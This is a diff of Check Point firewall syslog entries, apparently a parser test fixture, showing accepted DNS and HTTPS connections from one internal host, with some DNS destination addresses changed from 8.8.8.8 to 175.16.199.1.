-<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55437"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33356"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55437"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42746"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42748"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42750"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42752"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42754"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38162"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46059"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59268"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47423"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46059"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59268"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47423"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.11"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51844"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x8,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52760"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59627"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56317"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44832"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59627"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56317"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44832"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54030"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34455"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34455"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x5,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.218"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54642"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x6,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.218"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54644"; service:"443"; service_id:"https"; src:"192.168.2.2"]
